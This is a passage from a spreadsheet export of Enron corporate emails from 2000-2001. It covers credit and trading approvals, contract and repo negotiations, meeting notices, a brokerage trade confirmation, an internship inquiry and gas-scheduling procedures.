Gas Crack     http://www.carrfut.com/research/Energy1/gascrack33.pdf_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com</t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 09:35:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: EOL and Clickpaper Approvals: 10-3-01</t>
  </si>
  <si>
    <t xml:space="preserve">ditto credit -- except Idacorp Energy LP is authorized to trade WEST power only -- no east power._x000D_
_x000D_
Leslie_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Jones, Tana  _x000D_
Sent:	Wednesday, October 03, 2001 7:06 PM_x000D_
To:	Aronowitz, Alan; Calo, Andrea; Cooper, Tracy J. (EBS); Gaffney, Chris; Hansen, Leslie; Hodge, Jeffrey T.; Johnston, Greg; Keohane, Peter; Korkmas, Deb; McBride, Jane; Minns, David; Nettelton, Marcus; Powell, Mark; Rossi, Robbi; Van Hooser, Steve; Viverito, John_x000D_
Subject:	FW: EOL and Clickpaper Approvals: 10-3-01_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lebrocq, Wendi  _x000D_
Sent:	Wednesday, October 03, 2001 5:30 PM_x000D_
To:	Lambert, Karen; Jones, Tana; Schott, Samuel; Brackett, Debbie R.; Clark, Cynthia; Enron Europe Global CounterParty,; Sever, Stephanie; Moran, Tom; Clark, Claudia; Bradford, William S.; Lees, Lisa; Fayett, Juana; Morse, Jana; Le, Trang; Maley, Paul; O'day, Karen; Rohauer, Tanya; Lombardi, Kelly; Lindsay, Brian; EOL Call Center; Hare, Bill D.; Heffernan, Amy; Lafuze, Molly; Clark, Danny; Panus, Stephanie; Mandola, Teresa; Ebow, Amber; Arnold, Thu Pham; Coleman, Tandra; Campbell, Lesli; Lebrocq, Wendi; Taylor, Mark E (Legal); Lauer, Kara; Banner, Kimberly; Mcquade, Jennifer; George, Fraisy; Guillory, Michael; Rajaram, Aparna; Monterrey, Maribel; Curry, Ken_x000D_
Subject:	EOL and Clickpaper Approvals: 10-3-01_x000D_
_x000D_
_x000D_
Please see attached._x000D_
_x000D_
 &lt;&lt; File: EOL 10-03-01.xls &gt;&gt; _x000D_
_x000D_
Regards,_x000D_
_x000D_
Wendi LeBrocq_x000D_
3-3835_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Oct 2000 04:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'benjamin.rogers@enron.com', 'mike.miller@enron.com', 'don.miller@enron.com'})</t>
  </si>
  <si>
    <t>Y2K Site Directions...</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mitch Robinson/Corp/Enron on 10/05/2000 _x000D_
11:53 AM ---------------------------_x000D_
_x000D_
_x000D_
Katherine Padilla@ENRON_DEVELOPMENT_x000D_
10/05/2000 11:33 AM_x000D_
To: Mitch Robinson/Corp/Enron@ENRON_x000D_
cc: Tom Callaghan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Ross _x000D_
Newlin/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cecilia Ramirez/NA/Enron@ENRON _x000D_
_x000D_
Subject: Y2K Site Directions..._x000D_
_x000D_
Mitch,_x000D_
_x000D_
Per your request...Please see the attached for Wheatland, Lincoln &amp; Gleason. _x000D_
I am still waiting on a reponse from Doyle. _x000D_
_x000D_
Thanks,_x000D_
Katherine_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 Jan 2001 04:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>yeah.  you?  we have an extra day also.  i want to go out sat.</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 06:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Mr. LARRY CAMPBELL:_x000D_
_x000D_
Thank you for your order._x000D_
_x000D_
You bought 45 shares of JNPR (Juniper Networks Inc Com) at 136.500000._x000D_
_x000D_
ORDER DETAILS:_x000D_
The tracking number for this order is: B-300-AAZO-4506_x000D_
Order entered at:                      09:08:51 on 12/05/00_x000D_
Order processing began at:             09:08:51_x000D_
Order executed at:                     09:08:52 on 12/05/00_x000D_
_x000D_
ACCOUNT DETAILS:_x000D_
Time and Date: 09:08:52 on 12/05/00_x000D_
Your position in JNPR is 275 shares_x000D_
Your real cash total is $-17,999.16_x000D_
_x000D_
You will receive a printed Datek Online confirmation by postal mail, or by _x000D_
electronic delivery if you are subscribed to that service._x000D_
_x000D_
Questions regarding this transaction? Contact our Customer Support department _x000D_
by e-mailing support@datek.com. Please reference the order tracking number._x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 16:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: NRG bullet points</t>
  </si>
  <si>
    <t>Kay, looks great to me.  I would prefer to leave the benchmark open and be able to talk the counterparty through how it will be established (due diligence on plants, higher target means greater sharing % for ENE).  As far as cancellation is concerned, I think that it would be a good idea to include a right of cancellation for NRG based on a percentage of the benchmark established.  Something to the effect that NRG will have the annual right to terminate the agreement if we cannot achieve __% of the annual gross margin target._x000D_
_x000D_
Thanks-_x000D_
Bill_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Mann, Kay  _x000D_
Sent:	Wednesday, May 16, 2001 12:36 PM_x000D_
To:	Keeney, William_x000D_
Cc:	May, Tom; Marks, David; Scheuer, Janelle_x000D_
Subject:	Re: NRG bullet points_x000D_
_x000D_
I've made some revisions the Bill's document to make sure we are on the same page before I prepare the LOI.  _x000D_
_x000D_
 &lt;&lt; File: NRG Term Sheet.doc &gt;&gt; _x000D_
_x000D_
Do we want to give any sort of description of how the benchmark will be set?_x000D_
Do we want to mention the cancellation provisions?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 03:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Carolina Power &amp; Light EEI</t>
  </si>
  <si>
    <t>Ed:_x000D_
We are really close on finalizing the EEI.  The following are open credit _x000D_
points with them:_x000D_
_x000D_
1. They want their cross default to be $100 million too instead of $50._x000D_
_x000D_
2. They want to exclude from the affiliate definition Florida Power &amp; Light _x000D_
and its subs.  Their lawyer is sending me a list._x000D_
_x000D_
3. They want to raise both collateral thresholds from $20 to $50 million._x000D_
_x000D_
4. In the assignment language in section 10.5,  they want to specify a _x000D_
creditworthiness test in clauses (ii) and (iii), such that if the assignee or _x000D_
its guarantor is rated BBB- or Baa3, the assignment is permitted.  Clauses _x000D_
(ii) and (iii) relate to assignments to affiliates and assignments that occur _x000D_
as a result of mergers or asset transfers.  Right now the test is a generic _x000D_
creditworthiness test._x000D_
_x000D_
I look forward to hearing from you.  _x000D_
_x000D_
Carol St. Clair_x000D_
EB 3889_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 03:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>New Trader IDs</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you in advance for you help in adding this trader's name to the system:_x000D_
_x000D_
Add this Power Trader to the EnPower: Paul Choi_x000D_
_x000D_
Samuel Schott has told me that you would prefer to have the desk this trader _x000D_
works for, but because Paul is a mid-marketer he works with several different _x000D_
desks, including Long Term California and Long Term Southwest. Please let me _x000D_
know if you need more information._x000D_
_x000D_
Thanks,_x000D_
Kate Symes_x000D_
Trading Support_x000D_
503-464-7486_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 02:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Strategy</t>
  </si>
  <si>
    <t xml:space="preserve">Don't worry.  We'll try and take a hand at it.  </t>
  </si>
  <si>
    <t>Fri, 3 Nov 2000 03:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Hi E,_x000D_
?_x000D_
Have a great weekend and drive carefully.?  Tell Shanna hi and we'll see you _x000D_
Tuesday.? By the way, I just got back from  voting early.? It's raining and a _x000D_
lot of Repubs. were there standing in  line.? Everybody is tired of _x000D_
Clinton/Gore dirty tricks.?  LU-M</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 01:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lorie.leigh@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'david.fairley@enron.com', 'ben.jacoby@enron.com', 'ron.tapscott@enron.com', 'herman.manis@enron.com', 'fred.mitro@enron.com'})</t>
  </si>
  <si>
    <t>Re: PPAs and Misc MEETING THIS MORNING</t>
  </si>
  <si>
    <t xml:space="preserve">Conference room EB 3125B has been reserved for this meeting_x000D_
_x000D_
If you have any problems or questions, please feel free to call me at _x000D_
713-853-1696._x000D_
_x000D_
Thank you,_x000D_
Lorie Leigh_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Ben F Jacoby                           05/01/2001 05:14 PM_x000D_
	_x000D_
_x000D_
Sent by: Ben Jacoby_x000D_
To: Herman Manis/Enron@EnronXGate_x000D_
cc: Kay Mann/Corp/Enron@Enron, Fred Mitro/HOU/ECT@ECT, David _x000D_
Fairley/Enron@EnronXGate, Ron Tapscott/HOU/ECT@ECT, Lorie Leigh/HOU/ECT@ECT _x000D_
Subject: PPAs and Misc_x000D_
_x000D_
Herman:_x000D_
_x000D_
Subject to your availability, we'd like to meet with you to discuss the _x000D_
following:_x000D_
_x000D_
1. Tolling arrangements on Ft. Pierce, Midway, and Wisconsin._x000D_
2. Midway documents and dealbench access._x000D_
3. GE letter regarding the Northwestern deal, indicating their willingness to _x000D_
execute the acknowledgement and consent._x000D_
_x000D_
Please let me know if you're available at 10AM tomorrow morning. Lorie Leigh _x000D_
will advise the group of our conference room arrangements._x000D_
_x000D_
Regards,_x000D_
_x000D_
Ben_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 15:33:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'melissa.dozier@enron.com'})</t>
  </si>
  <si>
    <t>FW: Interviews Wednesday May 30, 2001 2 - 6PM  - Trading Track_x000D_
 Interviews</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Appointment-----_x000D_
From: 	Dozier, Melissa  _x000D_
Sent:	Wednesday, May 23, 2001 10:00 AM_x000D_
To:	Dozier, Melissa; Arnold, John_x000D_
Subject:	Interviews Wednesday May 30, 2001 2 - 6PM  - Trading Track Interviews_x000D_
When:	Wednesday, May 30, 2001 2:00 PM-6:00 PM (GMT-06:00) Central Time (US &amp; Canada)._x000D_
Where:	TBD_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 05:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tony Hamilton</t>
  </si>
  <si>
    <t xml:space="preserve">Mike,_x000D_
_x000D_
What do you think? I see pro's and con's._x000D_
The argument against is that during PRCs people comment_x000D_
positively or negatively about a person and this is how_x000D_
the word is spread about an employee._x000D_
Tony  could benefit from being in a London PRC._x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 05/07/2001 _x000D_
12:10 PM ---------------------------_x000D_
From: Anne Labbe/ENRON@enronXgate on 05/07/2001 11:22 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Tony Hamilton_x000D_
_x000D_
Vince,_x000D_
_x000D_
Would you like to review Tony Hamilton in your PRC meeting?  Currently he is _x000D_
not in our PEP system since he is on the London Payroll, but I can add him _x000D_
with no trouble at all._x000D_
_x000D_
Thanks,_x000D_
Anne_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 01:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Here is Part I of the Staff report (on Calfornia)._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 May 2000 10:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Dynegy Marketing and Trade--Credit Worksheet for HPL Master_x000D_
 Physical</t>
  </si>
  <si>
    <t>Attached below is the Credit Worksheet for a Master Physical Agreement to be _x000D_
entered into by and between Houston Pipe Line Company and Dynegy Marketing _x000D_
and Trade that the Counterparty has requested.   As explained in the _x000D_
worksheet comments section, both entities already have Guaranties.  However, _x000D_
Enron must add Houston Pipe Line Company as an additional "Buyer" in the _x000D_
Guaranty in place now (amount of $15MM, open expiry).  HPL is already _x000D_
included in the Gty issued by Dynegy._x000D_
_x000D_
Please give me a call if you have any questions on the worksheet._x000D_
_x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Veronica Espinoza</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 10:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.sayre@enron.com', 'cheryl.nelson@enron.com', 'mark.greenberg@enron.com', 'francisco.leite@enron.com', 'tana.jones@enron.com', 'anne.koehler@enron.com', 'carol.clair@enron.com', 'brent.hendry@enron.com', 'samantha.boyd@enron.com', 'stephanie.panus@enron.com', 'mary.cook@enron.com', 'susan.bailey@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Rod Nelson promotion</t>
  </si>
  <si>
    <t>It's official!  Rod Nelson has been promoted to Director._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com</t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 07:53:56 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Gas Risk Management staff Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Romero, Araceli  _x000D_
Sent:	Thursday, January 17, 2002 9:27 AM_x000D_
To:	Gossett, Jeffrey C.; Keiser, Kam; Couch, Greg; Gonzales, Alex; Palmer, B. Scott; Fowler, Kulvinder; Doan, Jad; Johnson, Luchas; Tackett, Scott; Kulic, Sladana-Anna; Hopkins, Stephanie; Bhatia, Randy; Jones, Monte; O'Rourke, Ryan; Pehlivanova, Biliana; Worthing, Ashley; Fay, Ashley; Love, Phillip M.; Rabon, Chance; Mills, Bruce; Clause, Kristen; Hungerford, James; Espey, Darren; Videtto, Melissa; Severson, Russ; Valdes, John; Sprowls, Cathy; Bowen, Melba A.; Lee, Jennifer; Mausser, Gregory A.; Castillo, Michael; McLaughlin Jr., Errol; Cavazos, Amy; Taylor, Joey; Loibl, Kori; Bailey, Derek; Thibaut, Dan; Nelson, Michelle; Vargas, Laura; Jones, Brad; Olney, Matthew; Winfree, O'Neal D.; Ryder, Patrick; Castro, Shielah; Underwood, Thomas; Perich, Stephen_x000D_
Subject:	Gas Risk Management staff Meeting _x000D_
_x000D_
A Gas Risk Management Staff meeting is scheduled this morning Thursday, January 17th, at 10:00 AM in conference room ECS 5075.  _x000D_
_x000D_
Thank you,_x000D_
_x000D_
AC </t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 04:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Revised Agenda for next TAR&amp;L meeting</t>
  </si>
  <si>
    <t>Greetings:_x000D_
Sorry to bother you with this, but I'm travelling, and if you could leave the _x000D_
call-in number for tomorrow's meeting on my voice mail, I'll be forever _x000D_
indebted.  Thanks a bunch._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 09:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: USGT filing</t>
  </si>
  <si>
    <t xml:space="preserve">Looks good to me--I think you ought to have them file it asap.  Then we need _x000D_
to get a couple of additional shippers to respond to Edwards' thing.  DF _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan Scott_x000D_
11/06/2000 04:10 PM_x000D_
To: Drew Fossum@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: USGT filing_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 07:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.k.wilson@enron.com', 'tom.doukas@enron.com', 'jeff.kinneman@enron.com'})</t>
  </si>
  <si>
    <t>RE: Enron Credit Inc. ("ECI") consent</t>
  </si>
  <si>
    <t>All:  attached below is the repo - see Par. 4 for "Margin Maintenance"_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 06/04/2001 02:53 PM -----_x000D_
_x000D_
	"Shanley, Gail" &lt;gail.shanley@gs.com&gt;_x000D_
	04/17/2001 08:44 AM_x000D_
		 _x000D_
		 To: "'Sara.Shackleton@enron.com'" &lt;Sara.Shackleton@enron.com&gt;, _x000D_
gail.shanley@gs.com_x000D_
		 cc: ted.leh@gs.com_x000D_
		 Subject: RE: Enron Credit Inc. ("ECI") consent_x000D_
_x000D_
_x000D_
Sara -_x000D_
_x000D_
I will look at your consent document today._x000D_
Attached please find the standard repo documentation used by Goldman._x000D_
_x000D_
Gail_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sara.Shackleton@enron.com [mailto:Sara.Shackleton@enron.com]_x000D_
Sent: Tuesday, April 17, 2001 9:42 AM_x000D_
To: gail.shanley@gs.com_x000D_
Cc: ted.leh@gs.com_x000D_
Subject: Enron Credit Inc. ("ECI") consent_x000D_
_x000D_
_x000D_
Gail:_x000D_
_x000D_
The commercial team is pressuring for a fairly quick implementation of a_x000D_
repo agreement.  If the consent which I sent yesterday is not satisfactory,_x000D_
please advise as soon as possible so that I can obtain a repo specific_x000D_
consent.  Also, could you please submit repo documents to me for review._x000D_
_x000D_
I do not know who may have contacted you from the London group (Enron_x000D_
Credit Ltd.) but we can surely coordinate.  That entity should have its own_x000D_
form of unanimous consent or resolution._x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 04/17/2001 08:36 AM -----_x000D_
_x000D_
_x000D_
                    Sara_x000D_
_x000D_
                    Shackleton           To:     gail.shanley@gs.com_x000D_
_x000D_
                                         cc:_x000D_
_x000D_
                    04/16/2001           Subject:     Enron Credit Inc._x000D_
("ECI") consent_x000D_
                    02:36 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Gail:_x000D_
_x000D_
Attached is a form of ECI unanimous consent.  Will you accept fhis for the_x000D_
purpose of signing a repo agreement and transacting thereunder?  Please let_x000D_
me know._x000D_
_x000D_
Also, you can email repo documents to me._x000D_
_x000D_
Thanks._x000D_
_x000D_
(See attached file: Resolution - ECI.doc)_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
 - p4233104a.pdf_x000D_
 - p4233104b.pdf</t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 08:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'shanecgreen@earthlink.net'})</t>
  </si>
  <si>
    <t>Re: Internship</t>
  </si>
  <si>
    <t>Dr. Kaminski:_x000D_
_x000D_
Sounds good.  You all have a nice weekend and 4th._x000D_
_x000D_
--Shane_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
To: &lt;shanecgreen@earthlink.net&gt;_x000D_
Cc: &lt;Vince.J.Kaminski@enron.com&gt;; &lt;Shirley.Crenshaw@enron.com&gt;_x000D_
Sent: Friday, June 30, 2000 2:33 PM_x000D_
Subject: Re: Internship_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt; Shane,_x000D_
&gt;_x000D_
&gt; Monday would work for us._x000D_
&gt;_x000D_
&gt; My assistant will contact you Wednesday to arrange the interviews._x000D_
&gt;_x000D_
&gt; Vince_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; "Shane Green" &lt;shanecgreen@earthlink.net&gt; on 06/30/2000 11:33:53 AM_x000D_
&gt;_x000D_
&gt; To:   &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
&gt; cc:_x000D_
&gt; Subject:  Internship_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Dr. Kaminski:_x000D_
&gt;_x000D_
&gt; I just wanted to touch base and see if I needed to snail mail  a copy of_x000D_
my_x000D_
&gt; resume or get in touch with anyone else over at Enron._x000D_
&gt;_x000D_
&gt; The finance department at LSU will be sending out financial  award letters_x000D_
&gt; to new Ph.D. students before long, and my interning at Enron would  free_x000D_
up_x000D_
&gt; some additional departmental funds. In addition, If I will be here  in_x000D_
&gt; Baton Rouge during the fall, I will need to pay my tuition next month.   I_x000D_
&gt; am able to pursue an internship in large part because of the department's_x000D_
&gt; cooperation and assurance that when I return I will still have a research_x000D_
&gt; and or  teaching assistantship to help fund the completion of Ph.D. I have_x000D_
&gt; been  told that such cooperation and assurances are rare at LSU, so I am_x000D_
&gt; trying to  rock the boat as little as possible._x000D_
&gt;_x000D_
&gt; I realize until I receive an offer from Enron my internship (I  say_x000D_
&gt; internship rather than sabbatical because LSU will not continue to pay me_x000D_
&gt; my  stipend while I am away) is not assured until an offer has been_x000D_
&gt; extended by  Enron. I understand that there are procedures and protocols_x000D_
&gt; that must  be followed before this occurs, and I would be willing to do_x000D_
&gt; whatever is  necessary to move to the next step in that process._x000D_
&gt;_x000D_
&gt; I will be in Houston on July 8 &amp; 9 for my wife's  grandmother's 80th_x000D_
&gt; birthday. If it would be convenient, I could be in  town on the preceding_x000D_
&gt; Friday, or following Monday for a visit and/or  interview. If not, given_x000D_
&gt; the relatively close proximity between Baton  Rouge and Houston, I would_x000D_
be_x000D_
&gt; happy to come at another time._x000D_
&gt;_x000D_
&gt; Thanks again,_x000D_
&gt; Shane Green_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 06:42:17 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'shift.dl-portland@enron.com', 'donald.robinson@enron.com'})</t>
  </si>
  <si>
    <t>RE: PATH CHANGE AT MEAD FOR 11/15</t>
  </si>
  <si>
    <t>I was able to access the record in path confrimation, and it has the correct info in it now._x000D_
_x000D_
C_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Robinson, Donald  _x000D_
Sent:	Wednesday, November 14, 2001 4:50 PM_x000D_
To:	DL-Portland Real Time Shift_x000D_
Cc:	Semperger, Cara; Runswick, Stacy_x000D_
Subject:	PATH CHANGE AT MEAD FOR 11/15_x000D_
_x000D_
MEAD HLH schedule for 5mw has a late downstream change.  Also, see Morgan tag #MS04315.  I could not access the new data base to change the path myself._x000D_
_x000D_
PAC(GEN)CH4-APS(T)CH4/WW5#1198(F)-APS(T)WW5/MED5#1197(F)-AZPS(T)MED5/MED2#1210(F)-PACE-EPMI-PNM-PPLE-MORGAN-PINW-APS(T)MD2/WW-PINW_x000D_
_x000D_
The previous downstream was Morgan wheeling into SP15 from Mead._x000D_
_x000D_
Thanks, Donald, presched.</t>
  </si>
  <si>
    <t>Wed, 16 Aug 2000 01:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Yesterday's discussion</t>
  </si>
  <si>
    <t xml:space="preserve">Include these questions to JB in the Ecogas SA letter_x000D_
_x000D_
_x000D_
_x000D_
	Randal Maffett_x000D_
	08/11/2000 02:28 PM_x000D_
		 _x000D_
		 To: Michelle Cash/HOU/ECT@ECT, Dan Lyons/HOU/ECT@ECT, Richard B _x000D_
Sanders/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Yesterday's discussion_x000D_
_x000D_
Read JB's response to my phone call below.  I'm not sure what's going on but _x000D_
if you read the info I had sent to you (via intercompany mail), there are a _x000D_
number of questions which are relevant:_x000D_
_x000D_
Why does M. Panelo's e-mail reference JB's ownership being 33%?_x000D_
Why is JB's signature on the MOU Amendment?  What is his authority as a _x000D_
signatory?  If he's not an officer of this "Ecogas S.A." then why is his _x000D_
signature evidenced?_x000D_
_x000D_
We're trying to track down the faxes he referenced below.  Once received, _x000D_
I'll forward them if they're pertinent._x000D_
_x000D_
RTM_x000D_
_x000D_
---------------------- Forwarded by Randal Maffett/HOU/ECT on 08/11/2000 _x000D_
01:44 PM ---------------------------_x000D_
_x000D_
_x000D_
Jerrel Branson &lt;jerrel@ecogas.com&gt; on 08/11/2000 12:03:41 PM_x000D_
To: "'Randal.Maffett@enron.com'" &lt;Randal.Maffett@enron.com&gt;_x000D_
cc: "'rstephens@bracepatt.com'" &lt;rstephens@bracepatt.com&gt;, _x000D_
"'spieringer@lockeliddell.com'" &lt;spieringer@lockeliddell.com&gt; _x000D_
Subject: Yesterday's discussion_x000D_
_x000D_
_x000D_
Randy,_x000D_
_x000D_
I am concerned about our conversation of yesterday morning.  I sent by fax_x000D_
to you all relevant documents I have concerning any South American details_x000D_
which have Ecogas involvement.  As stated over the phone and set out in the_x000D_
documents, I have never had any ownership interest in any corporation,_x000D_
partnership, joint-venture, etc. for South America relating to Ecogas.  The_x000D_
documents which you suggest you have cannot represent any such interest as_x000D_
it does not and never has existed.  I simply would not act in that manner_x000D_
and would have expected you to hold that understanding._x000D_
_x000D_
Given the status of Ecogas' operations currently I want to suggest that we_x000D_
all direct our total efforts to resolution of that crisis, rather than_x000D_
continuing personal distractions and devisiveness._x000D_
_x000D_
Regards,_x000D_
_x000D_
Jerrel_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Mar 2000 12:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'katherine.kelly@enron.com', 'maria.garza@enron.com', 'pat.clynes@enron.com', 'randall.gay@enron.com', 'carlos.rodriguez@enron.com', 'kimberly.olinger@enron.com', 'george.smith@enron.com', 'edward.terry@enron.com', 'daren.farmer@enron.com', 'chris.germany@enron.com', 'tricia.bowen@enron.com'})</t>
  </si>
  <si>
    <t>Procedure for adding new Capacity tickets for multi-desk Service_x000D_
 utilization</t>
  </si>
  <si>
    <t>In order to provide the ability to track transport expense by Desk, Sitara _x000D_
was modified to allow multiple Transport Capacity tickets for the same _x000D_
Service Contract provided that they are for different desks and only one is _x000D_
tagged as "Primary".  Here is the procedure for setting up new Capacity _x000D_
tickets to reflect the "other" desks:_x000D_
_x000D_
a.  You will probably first notice this via a warning/error message in Path _x000D_
Manager when building a new path.  The message will read something like   _x000D_
"Source/Destination 123456 for desk IMCT does not match Service contract 3434 _x000D_
and will be removed."_x000D_
b.  Make note of the deal number in the Service List of the Service contract _x000D_
that you were using in the new path._x000D_
c.  Open that Transport Capacity deal in Sitara.  Then hit Copy._x000D_
d.  On the new deal:_x000D_
 Change the Buyer from the old desk to the new desk that matches the Supply _x000D_
or Market deal that you are pathing with.  If it a contract for which we are _x000D_
  agent, then don't change the Buyer but instead change the Agent to the new _x000D_
desk.  The "primary" deal will carry the actual Agent._x000D_
 Changing the Buyer causes the Contract field to get blanked out.  Re-select _x000D_
the contract._x000D_
 Just above the various exchange line items is a Primary Deal check box.  _x000D_
Un-check it._x000D_
 On each exchange line item, change the MDQ to zero and for any Negotiated _x000D_
rates, uncheck them as well.  The "primary" deal will carry the MDQ and_x000D_
  any negotiated Demand, Commodity or fuel._x000D_
 Hit Release._x000D_
e.  You may need to re-retrieve Path Manager.  You should see the Deal number _x000D_
in the Service list now read "Multiple".  Right-click/Service Deals will list _x000D_
the  specific deals._x000D_
f.  Re-build the path as you originally desired.  The warning/error message _x000D_
should not appear again._x000D_
_x000D_
This could occur for any combination of Desk and Service Contract._x000D_
Please file this in your "Call Dave If I Can't Find This" folder._x000D_
_x000D_
Thanks, d.n.</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 13:08:43 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'teresa.mihalik@enron.com', 'joseph.des@enron.com', 'don.black@enron.com'})</t>
  </si>
  <si>
    <t>Peoples Gas - IL</t>
  </si>
  <si>
    <t>Peoples Gas has backed down from their request for a letter of credit to provide "Adequate Assurances of Payment", as stated in their tariff.  They will continue to accept a parental guaranty, which is due no later than December 3 (and which Teresa says is being processed).  The amount at issue is about $40k._x000D_
_x000D_
However, they are sending me a letter that will say, if there is any further downgrade in our rating, they will immediately require a l/c or cash deposit.</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 03:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: Amendment</t>
  </si>
  <si>
    <t xml:space="preserve">Michelle:_x000D_
_x000D_
Attached is an executable version of the amendment that includes the changes _x000D_
that you requested.  Please secure execution on behalf of IDACORP Energy and _x000D_
